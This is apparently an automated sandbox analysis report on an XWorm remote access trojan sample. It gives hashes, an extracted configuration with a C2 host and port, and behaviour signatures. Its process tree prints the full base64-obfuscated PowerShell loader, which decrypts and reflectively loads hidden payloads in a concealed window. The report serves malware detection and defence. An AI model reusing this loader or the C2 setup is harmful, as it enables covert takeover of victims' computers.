xworm | 2a7ac0e5a3c13e07d3992907e86ec563a19f092fae7269b1eef0b8982ad66d5a

General

Target

windows.cmd
Size

41KB
MD5

7c1a0a81ca6698741b4e63474dd92aec
SHA1

b280133be4093e3b3e26f8d093b586c56b08c307
SHA256

2a7ac0e5a3c13e07d3992907e86ec563a19f092fae7269b1eef0b8982ad66d5a
SHA512

c34baf46f54d94784cb15ad47557143c379270a1d1fb9c1a0249afd6055e3416ac13315e9d53091f6f5a218572c22779989b6ebe5d572ee57876ceb22ef4f8d2
SSDEEP

768:7hVuKGJcDLbuIQS1Bi9LA51oYuBZnYHUCpZs2P/FA220SIv7FSBCtY7YleBQl:7T3LbfQKqq/s2P/+220SID4oSYlWQl

Score

10^/10

xworm rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

myday.duckdns.org:8895

Mutex

NMs5XoXNfsv6X5Qw

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3892-120-0x000002457D690000-0x000002457D69E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	3892	powershell.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3892	powershell.exe
3892	powershell.exe
3892	powershell.exe
596	powershell.exe
596	powershell.exe
596	powershell.exe
3892	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeDebugPrivilege	596	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3892	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 164 wrote to memory of 1756	164	cmd.exe	76
PID 164 wrote to memory of 1756	164	cmd.exe	76
PID 164 wrote to memory of 1612	164	cmd.exe	77
PID 164 wrote to memory of 1612	164	cmd.exe	77
PID 1612 wrote to memory of 600	1612	cmd.exe	79
PID 1612 wrote to memory of 600	1612	cmd.exe	79
PID 1612 wrote to memory of 2312	1612	cmd.exe	80
PID 1612 wrote to memory of 2312	1612	cmd.exe	80
PID 1612 wrote to memory of 3892	1612	cmd.exe	81
PID 1612 wrote to memory of 3892	1612	cmd.exe	81
PID 3892 wrote to memory of 596	3892	powershell.exe	82
PID 3892 wrote to memory of 596	3892	powershell.exe	82

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:164
- C:\Windows\system32\cmd.exe
  cmd /c "set __=^&rem"
  2⤵
  PID:1756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1612
- - C:\Windows\system32\cmd.exe
    cmd /c "set __=^&rem"
    3⤵
    PID:600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gS0NMQUMoJFhwbHZMKXskTHl0QlI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JEx5dEJSLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskTHl0QlIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRMeXRCUi5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnVEJSbUcxd28rdWF0QURqb3VteXpOQ2RPdHR2Mm9SVFByZ2VvRE1mOXQrOD0nKTskTHl0QlIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRzJYODNZL2FpSmRPajBHVkh1K3gydz09Jyk7JHpyS29PPSRMeXRCUi5DcmVhdGVEZWNyeXB0b3IoKTskbEJ2SWU9JHpyS29PLlRyYW5zZm9ybUZpbmFsQmxvY2soJFhwbHZMLDAsJFhwbHZMLkxlbmd0aCk7JHpyS29PLkRpc3Bvc2UoKTskTHl0QlIuRGlzcG9zZSgpOyRsQnZJZTt9ZnVuY3Rpb24ga0tOV1goJFhwbHZMKXskcHBsdXI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkWHBsdkwpOyRKb2ZSSz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JEtSU2RMPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJHBwbHVyLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskS1JTZEwuQ29weVRvKCRKb2ZSSyk7JEtSU2RMLkRpc3Bvc2UoKTskcHBsdXIuRGlzcG9zZSgpOyRKb2ZSSy5EaXNwb3NlKCk7JEpvZlJLLlRvQXJyYXkoKTt9JG1MTmtiPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskZWJ6eVg9a0tOV1ggKEtDTEFDIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJG1MTmtiLCA1KS5TdWJzdHJpbmcoMikpKSk7JFRIeXlTPWtLTldYIChLQ0xBQyAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRtTE5rYiwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kVEh5eVMpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGVienlYKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
    3⤵
    PID:2312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:596

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lvnkfimb.5zx.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/596-57-0x00007FFFA6680000-0x00007FFFA706C000-memory.dmp

Filesize
9.9MB

Download
memory/596-111-0x00007FFFA6680000-0x00007FFFA706C000-memory.dmp

Filesize
9.9MB

Download
memory/596-110-0x0000015849280000-0x0000015849290000-memory.dmp

Filesize
64KB

Download
memory/596-60-0x0000015849280000-0x0000015849290000-memory.dmp

Filesize
64KB

Download
memory/596-59-0x0000015849280000-0x0000015849290000-memory.dmp

Filesize
64KB

Download
memory/3892-34-0x000002457D590000-0x000002457D5CC000-memory.dmp

Filesize
240KB

Download
memory/3892-113-0x000002457D530000-0x000002457D53A000-memory.dmp

Filesize
40KB

Download
memory/3892-4-0x0000024564E30000-0x0000024564E52000-memory.dmp

Filesize
136KB

Download
memory/3892-8-0x0000024564C40000-0x0000024564C50000-memory.dmp

Filesize
64KB

Download
memory/3892-7-0x0000024564C40000-0x0000024564C50000-memory.dmp

Filesize
64KB

Download
memory/3892-5-0x00007FFFA6680000-0x00007FFFA706C000-memory.dmp

Filesize
9.9MB

Download
memory/3892-112-0x0000024564C40000-0x0000024564C50000-memory.dmp

Filesize
64KB

Download
memory/3892-45-0x000002457D8B0000-0x000002457D926000-memory.dmp

Filesize
472KB

Download
memory/3892-114-0x00007FFFC39F0000-0x00007FFFC3BCB000-memory.dmp

Filesize
1.9MB

Download
memory/3892-116-0x00007FFFC3280000-0x00007FFFC332E000-memory.dmp

Filesize
696KB

Download
memory/3892-119-0x000002457D680000-0x000002457D68C000-memory.dmp

Filesize
48KB

Download
memory/3892-120-0x000002457D690000-0x000002457D69E000-memory.dmp

Filesize
56KB

Download
memory/3892-123-0x00007FFFA6680000-0x00007FFFA706C000-memory.dmp

Filesize
9.9MB

Download
memory/3892-124-0x0000024564C40000-0x0000024564C50000-memory.dmp

Filesize
64KB

Download
memory/3892-126-0x0000024564C40000-0x0000024564C50000-memory.dmp

Filesize
64KB

Download
memory/3892-127-0x00007FFFC39F0000-0x00007FFFC3BCB000-memory.dmp

Filesize
1.9MB

Download

Analysis

Sharing